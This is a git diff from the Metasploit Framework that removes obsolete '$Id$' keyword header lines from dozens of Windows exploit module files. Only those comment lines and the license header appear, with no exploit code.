a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 2213dd87c3..9e6d1a755a 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 2d352ebd21..13e30385cd 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/ca_arcserve_342.rb b/modules/exploits/windows/brightstor/ca_arcserve_342.rb index 1c0fba48f9..c1584c6ad8 100644 --- a/modules/exploits/windows/brightstor/ca_arcserve_342.rb +++ b/modules/exploits/windows/brightstor/ca_arcserve_342.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index a495f6f556..8acb41a022 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index e829fac64c..c8e5aee98c 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index 5be05ca50f..207154ad86 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb index 437400204a..b43e19fd21 100644 --- a/modules/exploits/windows/brightstor/hsmserver.rb +++ b/modules/exploits/windows/brightstor/hsmserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb index 6ce0417805..8407deae6e 100644 --- a/modules/exploits/windows/brightstor/lgserver.rb +++ b/modules/exploits/windows/brightstor/lgserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb index 7aff7a7d09..9003326a36 100644 --- a/modules/exploits/windows/brightstor/lgserver_multi.rb +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index 41a451bdc5..e3bef411f2 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index 4bb856dae7..330dfa95d2 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index 68c6dc0dd4..a15b01dfd8 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/license_gcr.rb b/modules/exploits/windows/brightstor/license_gcr.rb index f00758eb42..89500ddb8a 100644 --- a/modules/exploits/windows/brightstor/license_gcr.rb +++ b/modules/exploits/windows/brightstor/license_gcr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index 4a67afd148..757bc198f3 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index 0117963341..9a7fc590b6 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/message_engine_72.rb b/modules/exploits/windows/brightstor/message_engine_72.rb index 36a168c200..6e48f213e7 100644 --- a/modules/exploits/windows/brightstor/message_engine_72.rb +++ b/modules/exploits/windows/brightstor/message_engine_72.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb index 4e589be74f..997ee716a2 100644 --- a/modules/exploits/windows/brightstor/message_engine_heap.rb +++ b/modules/exploits/windows/brightstor/message_engine_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb index 5f6b22542a..6b718f9d87 100644 --- a/modules/exploits/windows/brightstor/sql_agent.rb +++ b/modules/exploits/windows/brightstor/sql_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index e60158de8c..18a9a5a91b 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/tape_engine_8A.rb b/modules/exploits/windows/brightstor/tape_engine_8A.rb index 0bac723c5b..0ff6f778f1 100644 --- a/modules/exploits/windows/brightstor/tape_engine_8A.rb +++ b/modules/exploits/windows/brightstor/tape_engine_8A.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index eed21a3cee..4e23df13a7 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index 85c9047d2a..32f8cc6f85 100644 --- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb index da4cf1e2d0..687daf9566 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb index bd1da5a0bd..7bd33b3e22 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index c481b5ae92..085c67a70d 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index 0d8f1a9b8d..48ce661fa4 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb index 379287a8dd..70962791ec 100644 --- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb index eaab78f267..ec47b1eff2 100644 --- a/modules/exploits/windows/browser/adobe_geticon.rb +++ b/modules/exploits/windows/browser/adobe_geticon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 45303d6cd3..69fb060fc6 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index e792e38b4f..9ee1cebf3a 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index 8f06ee14df..bb824738ad 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index 61a08cd261..4d449d4c4f 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index 32a71920fe..32c72af9fc 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb index 3fa7f03d22..101f00b3d8 100644 --- a/modules/exploits/windows/browser/amaya_bdo.rb +++ b/modules/exploits/windows/browser/amaya_bdo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb index 21daa6416d..8515f2d696 100644 --- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb +++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb index bf5a841ca2..9cb78c5f1e 100644 --- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb +++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb index dae52efd67..f06381c84f 100644 --- a/modules/exploits/windows/browser/apple_itunes_playlist.rb +++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 8e19dbfa1c..2ad21d750c 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index 5f1e6bb39e..93d87ac6ef 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index ffcb83b511..2391b36c69 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index 07e1cedd6e..779e2e7939 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 25854225a3..7b2a1b5d2a 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index 2f7fe92ccd..046ac53bf7 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index 6532588ea8..2ef4ac8eff 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 1c710c2cd0..343c589a1b 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb index d0e9086ad9..d20a6e0264 100644 --- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb +++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index b94ab916d5..dd7de45cdc 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index dc30d37e03..372c2c9822 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 9d3c103e3d..8ca88ff4f5 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index de154ba864..9f74970785 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index d32fbd3d58..641ac6819f 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb index 865eb0f1c8..ba225b2f78 100644 --- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb +++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index c8697b0b7a..d3019a0eb4 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index a5ae172ff2..a2a2e35ff8 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 766e4c6d8e..576a2bd903 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index 9e4206cb9c..fa4f4dda5c 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index ca31962c54..fec5e92f4f 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 2bc7353e7e..849fed95a4 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index 1c5d02f04c..72d228d091 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index b62bfe5ecc..84d078e673 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index e98bcb89ee..e8153ede4f 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index 3c11959283..e79390caac 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/greendam_url.rb b/modules/exploits/windows/browser/greendam_url.rb index 4db92c7f7b..92266b0c86 100644 --- a/modules/exploits/windows/browser/greendam_url.rb +++ b/modules/exploits/windows/browser/greendam_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 11b118f7e9..8801c94e12 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index a56fb1b05c..3e03f5f35a 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index f9afda169b..29b6f669e4 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index 2b97fb2ac6..f159e3c78f 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb index d462b9b40f..0ee008d78a 100644 --- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## 